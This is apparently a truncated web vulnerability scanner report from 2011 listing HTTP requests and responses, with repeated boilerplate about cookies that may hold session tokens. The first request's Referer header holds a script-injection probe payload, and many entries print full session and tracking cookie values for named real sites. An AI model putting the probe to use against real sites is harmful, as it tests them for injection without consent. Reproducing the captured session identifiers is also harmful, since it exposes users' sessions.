GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1 Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL2123 = 'http://www. ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forum/ HTTP/1.1 Host: www.parker-software.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 13:58:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET pragma: no-cache cache-control: private Content-Length: 21920 Content-Type: text/html Expires: Wed, 26 Jan 2011 13:58:10 GMT Set-Cookie: WWF9lVisit=LV=2011%2D01%2D28+13%3A58%3A10; expires=Sat, 28-Jan-2012 13:58:10 GMT; path=/forum/ Set-Cookie: WWF9sID=SID=629255141c2dfczb44f2d1ea4be92fz9; path=/forum/ Set-Cookie: ASPSESSIONIDCQSCRASQ=CIEMDCNAFMCFHFEFAKMMMFLF; path=/ Cache-control: No-Store
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"> <head> <m ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.screenthumbs.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:52:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Set-Cookie: PHPSESSID=03c0e7391c4e0c2e4a05965642293dcb; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a; path=/ Content-type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /i.cid?c=246673&d=30&page=landingPage HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1361549;type=landi756;cat=zipco403;ord=1;num=3596418555825.9487? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=arn7TwNZaiMt6memCmGwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bWalbfCPvRr5pHFJ2IiiqvUj8gL5UKMojsRtkyGv3iLgZdLhJWNtFwIaQqSDUhJXcolRQQftgBRpZbqFL3j1LmZaRLgOPqeE7bMdTEIGxtZdfM5WI7wWtsmYZaJOJkAibgqRMFJEdwIqaWU9WeZd8ntA03ww6cnyXOZbrqhfFE1rXFZdZb7tIQT1LDwroLnCrSBFdeNZb3ZbqSUdhKTLyZaa4ZcFGHeZbVThMfN8pnAYOeBZbsKVSfraRuvG30PErMalZa5
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
